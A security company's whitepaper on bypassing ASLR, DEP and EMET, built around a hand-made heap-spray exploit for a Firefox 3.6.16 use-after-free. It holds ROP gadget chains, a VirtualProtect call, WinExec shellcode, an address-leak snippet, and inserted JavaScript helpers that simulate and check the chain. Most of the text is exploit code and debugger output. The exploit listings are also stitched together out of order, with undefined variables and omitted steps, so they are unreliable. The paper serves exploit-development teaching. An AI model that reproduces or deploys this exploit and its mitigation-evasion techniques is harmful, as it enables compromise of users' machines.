WHITEPAPER – Bypassing ASLR/DEP

WWW.SECFENCE.COM

Data Execution Prevention (DEP) is a security feature of modern operating systems, available on Linux, Mac OS X and Microsoft Windows, that prevents an application or service from executing code from a non-executable memory region. Address Space Layout Randomization (ASLR) randomizes the positions of key areas of a process's address space, usually the base of the executable and the positions of the libraries, the heap and the stack. This paper covers techniques to bypass both mechanisms, shows how custom shellcodes are developed, and also looks at bypassing EMET (Enhanced Mitigation Experience Toolkit).


function alfa(){
    var a1=document.cookie;
}
var a=window.setTimeout(alfa,100);
alert(a.toString(16)); // timer id in hex; minus 1 it is an address inside mshtml.dll

This leak is a little old now: the value rendered by a.toString(16), minus 1, is an address inside mshtml.dll, and it is a good pointer to pointer. Similarly, on Windows 7 64-bit the base address of ntdll.dll can be found at 0x7ffe360, while on all 32-bit Windows versions 0x7ffe300 holds the address of the sysenter stub and 0x7ffe304 the address of its ret instruction. All of these are pointers to pointers (**), whereas to form a shellcode dynamically we need a direct pointer. Custom shellcodes assembled at run time from leaked pointers can be simpler and give more control than the traditional shellcodes produced by msf and similar tools. Their main advantage is that they easily evade mitigations such as EMET (Enhanced Mitigation Experience Toolkit) and AV engines. Let us proceed with an example.


The example vulnerability (mchannel) affects Firefox 3.6.16, and working exploits for it are already available. We will nevertheless develop the ROP chain and the shellcode by hand, without automated scripts: automation sometimes misses points, makes things more complex than they need to be, and produces solutions that are neither elegant nor simple.

<html>
<head>
</head>
<body>
<object id="d"></object>
<script>

var obj = unescape("\x00%u0c10"); // makes the ECX register point to the first
                                  // byte of our chunk when the freed object is used

function ignite() {
var e=document.getElementById("d");

var heap = unescape(
/* ROP : placeholder dwords, replaced once the offsets are known */
 "%u0101%u0102"
+"%u0103%u0104"
+"%u0105%u0106"
+"%u0107%u0108"
+"%u0109%u010a"
+"%u010b%u010c"
+"%u010d%u010e"
+"%u010f%u0111"
+"%u0112%u0113"
+"%u0114%u0115"
+"%u0116%u0117"
+"%u0118%u0119"
+"%u011a%u011b"
+"%u011c%u011d"
+"%u011e%u011f"
+"%uCCCC%uCCCC%uCCCC%uCCCC"
+"%uBBBB%uCCCC%uDDDD%uEEEE")

/* Shellcode : */ +unescape("%u9090%u9090"+"%u9090%u9090"
// ... shellcode continues (the full listing is given with the complete exploit below)
);

// vftable and heapblock are built as in the complete exploit below
while (heapblock.length<0x80000) {heapblock += heap+heapblock;}

var finalspray = heapblock.substring(0,0x80000 - heap.length - 0x24/2 - 0x4/2 - 0x2/2);

var spray = new Array()

}

If the medium you pass the code through converts %uXXXX sequences into their characters, put a space between the % and the u and remove it again before running: every %u group inside the unescape calls must be contiguous. We are going to develop this exploit for Windows 7 32-bit (check the offsets for Windows XP; the offsets also differ between native 32-bit Windows 7 and WOW64, so check and fix them). Also install EMET from Microsoft's website. It mitigates most shellcodes, but ours will bypass it and stay compact.

The result of the above code:

Certain instructions, of the kind usually used as a stack pivot, could be of help, but we could not find anything useful among them. The following gadget, however, was discovered:

6623BE51  XCHG EAX,ESP
          RETN

This gadget needs EAX to hold the address stored at the location ECX points to. ECX points to the first bytes of our heap block; MOV EAX,[ECX] loads that dword, and the next call is made through the address at EAX+8. The debugger output:

0C100000  01 01 02 01 03 01 04 01
0C100008  05 01 06 01 07 01 08 01
0C100010  09 01 0A 01 0B 01 0C 01 ...


We need to place the first gadget address at 0C100018 (in place of the bytes 0D 01 0E 01) and replace the dword at 0C100000 (01 01 02 01) with a pointer such that pointer+8 holds the address of the next gadget (XCHG EAX,ESP; RETN), which sits in the "%u0107%u0108" slot, i.e. at 0x0C10000C. So if 0x0C100000 holds 0x0C100004, MOV EAX,[ECX] gives EAX = 0x0C100004 and CALL [EAX+8] reads the gadget address from 0x0C10000C.

See the following code section:

+"%u0103%u0104"
+"%u0105%u0106"
+"%uBE51%u6623"// XCHG EAX,ESP; RETN
+"%u0109%u010a"
+"%u010b%u010c"
+"%u5B33%u661C"// GR469A~1.DLL:
              // 8B01     MOV EAX,DWORD PTR DS:[ECX]
              // FF50 08  CALL DWORD PTR DS:[EAX+8]
+"%u010f%u0111"
+"%u0112%u0113"
+"%u0114%u0115"
+"%u0116%u0117"
+"%u0118%u0119"
+"%u011a%u011b"
+"%u011c%u011d"
+"%u011e%u011f"

This turns our heap block into our new stack, as shown below:

0C100000  0C100004
0C100004  01040103
0C100008  01060105
0C10000C  6623BE51  GR469A~1.6623BE51
0C100010  010A0109
0C100014  010C010B  firefox.010C010B
0C100018  661C5B33  GR469A~1.661C5B33
0C10001C  0111010F  firefox.0111010F
0C100020  01130112  firefox.01130112
0C100024  01150114  firefox.01150114
0C100028  01170116  firefox.01170116
0C10002C  01190118
0C100030  011B011A
0C100034  011D011C
0C100038  011F011E
0C10003C  90909090
0C100040  90909090
0C100044  CCCCCCCC
0C100048  CCCCCCCC
0C10004C  CCCCBBBB
0C100050  EEEEDDDD
0C100054  636C6163  "calc"
0C100058  6578652E  ".exe"
0C10005C  CCCC0000


We have completed the first phase with a successful stack pivot, so the next return instruction will land on an address in our new stack (our heap block). The next phase is to get a pointer to kernel32.VirtualProtect and put its arguments on our stack to bypass DEP. The instructions we have to get through are:

POP ESI
LEAVE
RETN 4

The instruction that causes trouble is LEAVE: it tears down the current stack frame (MOV ESP,EBP; POP EBP). The stack frame is the block between ESP and EBP, and so far EBP still holds an address that would make us lose our stack once again, so EBP must contain an address just before the start of the shellcode. Now we have the following code:


e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0);

var vftable = unescape("\x00%u0c10"
+"%uBCBB%u68F1"// POP EDI; POP EBX; POP ESI; RETN
+"%u0105%u0106"//
+"%uBE51%u6623"// XCHG EAX,ESP; RETN
+"%u0030%u0c10"//
+"%u7C2A%u68F0"// POP EDI; POP EBP; RETN
+"%u5B33%u661C"// GR469A~1.DLL:
              // 8B01     MOV EAX,DWORD PTR DS:[ECX]
              // FF50 08  CALL DWORD PTR DS:[EAX+8]
+"%u0030%u0c10"// will be popped into EBP
+"%uF1DD%u68F2"// pointer to VirtualProtect
+"%u0030%u0c10"// base address of shellcode
+"%u0040%u0000"// PAGE_EXECUTE_READWRITE attributes
+"%u0038%u0c10"// will be popped into ESI
+"%uCCCC%uCCCC%uCCCC%uCCCC"
+"%uBBBB%uCCCC%uDDDD%uEEEE"
);

while(vftable.length < 0x10000) {vftable += vftable;}

var heapblock = heap+vftable.substring(0,0x10000/2-heap.length*2);

for (var iter=0;iter<0x100;iter++){
spray[iter] = finalspray+heap;
}

EAX 0C100030
ECX 0C0FFFDC
EDX 770264F4 ntdll.KiFastSystemCallRet
EBX 6623BE51 GR469A~1.6623BE51
ESP 0C10003C
EBP 0C0C0C0C
ESI 0C100038
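To see why the layout above hands control over cleanly, the following added example (JavaScript, not code from the whitepaper) steps through the fake vtable with plain x86 semantics for CALL, XCHG, POP and RET and reports the registers at the moment control reaches the VirtualProtect pointer; it then shows what the LEAVE in the POP ESI; LEAVE; RETN 4 tail does to ESP. Memory holds only the dwords from the listing, and the gadget addresses are the ones quoted above; the original stack and frame pointer values, and the ESP position at which the tail runs, are assumptions marked in the code.

```javascript
// Added example, not from the whitepaper: step the fake vtable / ROP layout from the
// listing above with plain x86 stack semantics to confirm the pivot offline.
// Memory contains only the dwords the paper shows; anything else reads as 0.

const GADGETS = {
  0x661C5B33: 'MOV EAX,[ECX]; CALL [EAX+8]',
  0x6623BE51: 'XCHG EAX,ESP; RETN',
  0x68F1BCBB: 'POP EDI; POP EBX; POP ESI; RETN',
  0x68F07C2A: 'POP EDI; POP EBP; RETN',
  0x68F2F1DD: 'pointer to VirtualProtect (walk stops here)',
};

const CHUNK = [                       // address, dword
  [0x0C100000, 0x0C100004],           // [ECX]: becomes EAX, then ESP after the XCHG
  [0x0C100004, 0x68F1BCBB],
  [0x0C100008, 0x01060105],
  [0x0C10000C, 0x6623BE51],           // [EAX+8]: the pivot
  [0x0C100010, 0x0C100030],
  [0x0C100014, 0x68F07C2A],
  [0x0C100018, 0x661C5B33],           // vtable slot the hijacked virtual call uses
  [0x0C10001C, 0x0C100030],           // popped into EBP
  [0x0C100020, 0x68F2F1DD],
  [0x0C100024, 0x0C100030],
  [0x0C100028, 0x00000040],
  [0x0C10002C, 0x0C100038],
];

function makeState() {
  // Original stack and frame pointer values are assumptions; only their relation matters.
  return { mem: new Map(CHUNK), eax: 0, ecx: 0x0C100000, ebx: 0, esi: 0, edi: 0,
           ebp: 0x0012FF70, esp: 0x0012FF40, eip: 0, trace: [] };
}
const rd = (s, a) => s.mem.get(a >>> 0) || 0;
const wr = (s, a, v) => s.mem.set(a >>> 0, v >>> 0);
const pop = (s) => { const v = rd(s, s.esp); s.esp = (s.esp + 4) >>> 0; return v; };
const push = (s, v) => { s.esp = (s.esp - 4) >>> 0; wr(s, s.esp, v); };
const ret = (s) => { s.eip = pop(s); };
const hex = (v) => v.toString(16).toUpperCase().padStart(8, '0');

// Walk from the hijacked virtual call to the VirtualProtect pointer.
function runPivot() {
  const s = makeState();
  s.eip = rd(s, 0x0C100018);
  for (let step = 0; step < 16; step++) {
    s.trace.push(hex(s.eip) + '  ' + (GADGETS[s.eip] || '???'));
    switch (s.eip) {
      case 0x661C5B33:
        s.eax = rd(s, s.ecx);
        push(s, 0x661C5B38);             // CALL pushes its return address on the real stack
        s.eip = rd(s, s.eax + 8);
        break;
      case 0x6623BE51:
        [s.eax, s.esp] = [s.esp, s.eax]; // ESP now points into our chunk
        ret(s);
        break;
      case 0x68F1BCBB:
        s.edi = pop(s); s.ebx = pop(s); s.esi = pop(s); ret(s);
        break;
      case 0x68F07C2A:
        s.edi = pop(s); s.ebp = pop(s); ret(s);
        break;
      case 0x68F2F1DD:
        return s;
      default:
        throw new Error('left the chain at ' + hex(s.eip));
    }
  }
  throw new Error('VirtualProtect pointer never reached');
}

// The tail the text warns about: POP ESI; LEAVE; RETN 4. LEAVE is MOV ESP,EBP; POP EBP,
// so after RETN 4 ESP sits at EBP+0xC whatever it was before, and [EBP+4] is the
// return target. Assumption: ESP is 0x0C10002C when the tail runs (the position that
// reproduces ESP=0C10003C / ESI=0C100038 in the register dump above).
function runLeaveTail(ebp, esp = 0x0C10002C) {
  const s = makeState();
  s.ebp = ebp >>> 0; s.esp = esp >>> 0;
  s.esi = pop(s);                            // POP ESI
  s.esp = s.ebp; s.ebp = pop(s);             // LEAVE
  s.eip = pop(s); s.esp = (s.esp + 4) >>> 0; // RETN 4
  return { esi: s.esi, esp: s.esp, retSlot: (ebp + 4) >>> 0 };
}

// Stand-alone run: print the walk and both LEAVE outcomes.
const st = runPivot();
console.log(st.trace.join('\n'));
console.log('at VirtualProtect ptr: ESP=' + hex(st.esp) + ' EBP=' + hex(st.ebp) +
            ' EBX=' + hex(st.ebx) + ' EDI=' + hex(st.edi));
console.log('LEAVE with EBP=0C100030 -> ESP=' + hex(runLeaveTail(0x0C100030).esp));
console.log('LEAVE with original EBP -> ESP=' + hex(runLeaveTail(0x0012FF70).esp) +
            ' (back on the real stack, chain lost)');
```

The walk reproduces EBX=6623BE51 and EDI=661C5B33 from the register dumps, and the LEAVE tail with EBP=0C100030 ends with ESP=0C10003C and ESI=0C100038 as in the dump; with EBP left at its original value ESP falls back onto the real stack and the chain is lost.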


Now comes the next phase of our mission, the shellcode formation. We have two registers containing addresses within GR469A~1.dll:

EBX 6623BE51 GR469A~1.6623BE51
EDI 661C5B33 GR469A~1.661C5B33

Remember to interchange the bytes of each pair: every %uXXXX group is stored as a little-endian 16-bit unit, so the second byte is written first. If the number of bytes is odd, the last pair is completed with a 0x90 NOP. Then we take a kernel32 address into EAX from the pointer to pointer at [EDI]:

8B07  MOV EAX,DWORD PTR DS:[EDI]
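The byte-swapping rule above is where hand-built %u strings most often go wrong, so here is an added example in JavaScript (not code from the whitepaper) that encodes dwords and instruction bytes the way the exploit strings do, decodes them back the way unescape and the heap will see them, and reads the gadget slots back out of the chain. The CHAIN and SHELLCODE tables hold the dwords and opcode bytes listed in this paper; the helper names are mine, and since the page does not show the %u form of the MOV EAX,[EDI] instruction, that entry is encoded here from its opcode bytes.

```javascript
// Added example, not part of the whitepaper: helpers for the %uXXXX encoding used
// in the exploit strings. unescape("%uXXXX") produces one UTF-16 code unit, which
// the heap stores little-endian, so the two bytes of every %u group appear swapped.

const hex2 = (x) => x.toString(16).toUpperCase().padStart(2, '0');
const hex4 = (x) => x.toString(16).toUpperCase().padStart(4, '0');

// A 32-bit value as the exploit writes it: low half first, then high half.
// 0x6623BE51 (XCHG EAX,ESP; RETN) becomes "%uBE51%u6623".
function dwordToEscape(v) {
  return '%u' + hex4(v & 0xFFFF) + '%u' + hex4((v >>> 16) & 0xFFFF);
}

// Raw instruction bytes -> %u groups, second byte of each pair first. An odd
// trailing byte is completed with a 0x90 NOP, as the paper does for PUSH ECX.
function bytesToEscape(bytes) {
  const b = bytes.slice();
  if (b.length % 2) b.push(0x90);
  let out = '';
  for (let i = 0; i < b.length; i += 2) out += '%u' + hex2(b[i + 1]) + hex2(b[i]);
  return out;
}

// Decode the way the sprayed heap will see it: unescape, then each code unit
// as two little-endian bytes.
function escapeToBytes(s) {
  const str = unescape(s);
  const bytes = [];
  for (let i = 0; i < str.length; i++) {
    const c = str.charCodeAt(i);
    bytes.push(c & 0xFF, c >>> 8);
  }
  return bytes;
}

// Little-endian dword at a byte offset of a decoded chunk.
function dwordAt(bytes, off) {
  return (bytes[off] | (bytes[off + 1] << 8) | (bytes[off + 2] << 16) | (bytes[off + 3] << 24)) >>> 0;
}

// The shellcode from the paper, one instruction per entry so each gets its own
// NOP padding exactly as the listing does.
const SHELLCODE = [
  [0x81, 0xC7, 0x6D, 0x98, 0x07, 0x00], // ADD EDI,7986D
  [0x8B, 0x07],                         // MOV EAX,DWORD PTR DS:[EDI] (encoded here from its opcode)
  [0x05, 0xF5, 0xF6, 0x03, 0x00],       // ADD EAX,3F6F5  (odd length -> NOP pad)
  [0x6A, 0x05],                         // PUSH 5
  [0x51],                               // PUSH ECX       (odd length -> NOP pad)
  [0x8B, 0xF0],                         // MOV ESI,EAX
  [0xFF, 0xD0],                         // CALL EAX
  [0x81, 0xEE, 0xFA, 0x95, 0x04, 0x00], // SUB ESI,495FA
  [0x6A, 0xFF],                         // PUSH -1
  [0xFF, 0xD6],                         // CALL ESI
];

// Fake vtable / ROP slots from the paper's final listing, in order.
const CHAIN = [
  0x0C100000, 0x68F1BCBB, 0x01060105, 0x6623BE51, 0x0C100030, 0x68F07C2A,
  0x661C5B33, 0x0C100030, 0x68F2F1DD, 0x0C100030, 0x00000040, 0x0C100038,
];

// Whole chunk: chain dwords followed by the encoded shellcode.
function buildChunk(chain = CHAIN, shellcode = SHELLCODE) {
  return chain.map(dwordToEscape).join('') + shellcode.map(bytesToEscape).join('');
}

// Round-trip the built chunk and read back the slots the ROP walk depends on.
function checkChunk() {
  const bytes = escapeToBytes(buildChunk());
  return {
    pivot: dwordAt(bytes, 0x0C),        // must be XCHG EAX,ESP; RETN
    firstGadget: dwordAt(bytes, 0x18),  // must be MOV EAX,[ECX]; CALL [EAX+8]
    vprotect: dwordAt(bytes, 0x20),
    shellcodeStart: bytes.slice(CHAIN.length * 4, CHAIN.length * 4 + 6), // ADD EDI,7986D
  };
}
```

checkChunk() returns the slot values the ROP walk depends on, so a half-swapped group shows up as a garbage gadget address here instead of as a crash in the browser; note that "\x00%u0c10" and dwordToEscape(0x0C100000) decode to the same four bytes.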


0008E695  WinExec

Now we need to calculate the offset from that address to WinExec:

"%uF505%u03F6%u9000" // 05 F5F60300  ADD EAX,3F6F5 ; 90 NOP

Then we push 5 as an argument to WinExec. ECX is pointing somewhere in our heap block:

ECX = 0x0C0FFFDC

so we push ECX on the stack as well and call the function:

FFD0  CALL EAX

"%uD0FF"


And finally, after spending a lot of time, we have the exploit code ready. The complete exploit:

e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0);

var vftable = unescape("\x00%u0c10"
+"%uBCBB%u68F1"// POP EDI; POP EBX; POP ESI; RETN
+"%u0105%u0106"//
+"%uBE51%u6623"// XCHG EAX,ESP; RETN
+"%u0030%u0c10"
+"%u7C2A%u68F0"// POP EDI; POP EBP; RETN
+"%u5B33%u661C"// GR469A~1.DLL:
              // 8B01     MOV EAX,DWORD PTR DS:[ECX]
              // FF50 08  CALL DWORD PTR DS:[EAX+8]
+"%u0030%u0c10"// will be popped into EBP
+"%uF1DD%u68F2"// pointer to VirtualProtect
+"%u0030%u0c10"// base address of shellcode
+"%u0040%u0000"// PAGE_EXECUTE_READWRITE attributes
+"%u0038%u0c10"// will be popped into ESI
)

+unescape("%u9090%u9090"+"%u9090%u9090"

+"%uC781%u986D%u0007"// 81C7 6D980700  ADD EDI,7986D
// (the MOV EAX,[EDI] and ADD EAX steps shown in the walkthrough above belong here)
+"%u9090"
+"%u056A"// 6A 05  PUSH 5
+"%u9051"// 51  PUSH ECX ; 90  NOP
+"%uF08B"// 8BF0  MOV ESI,EAX
+"%uD0FF"// FFD0  CALL EAX

// +"%ucccc"

+"%uEE81%u95FA%u0004"// 81EE FA950400  SUB ESI,495FA

+"%uFF6A"// 6A FF  PUSH -1
+"%uD6FF"// FFD6  CALL ESI
+"%uCCCC"
);

while (heapblock.length<0x80000) {heapblock += heap+heapblock;}

var finalspray = heapblock.substring(0,0x80000 - heap.length - 0x24/2 - 0x4/2 - 0x2/2);
var spray = new Array()
}


ABOUT SECFENCE:
Secfence Technologies is a pure-play information security company based in India providing InfoSec services, trainings and products. We focus on both the offensive and defensive sides of security. For more details visit WWW.SECFENCE.COM.
